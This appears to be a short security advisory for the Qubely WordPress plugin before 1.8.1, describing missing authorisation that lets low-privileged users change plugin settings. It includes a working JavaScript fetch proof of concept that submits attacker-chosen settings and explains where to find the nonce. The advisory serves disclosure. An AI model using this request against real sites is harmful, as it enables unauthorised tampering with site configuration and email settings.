Qubely < 1.8.1 – Authenticated Arbitrary Settings Update

Description

The plugin does not have proper authorisation when saving its settings, allowing users with a role as low as subscriber (in versions < 1.7.9) or contributor (in v < 1.8.1) to update them

Proof of Concept

As a subscriber (Nonce can be taken from the qubely_local_script-js-extra script on the homepage)

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action": "update_qubely_options", "options[qubely_gmap_api_key]": "attacker-key", "options[form_from_name]": "Attacker", "options[form_from_email]": "attacker@domain.com", "_wpnonce": "602dfb5e65"}),
  "method": "POST",
  "credentials": "include"
});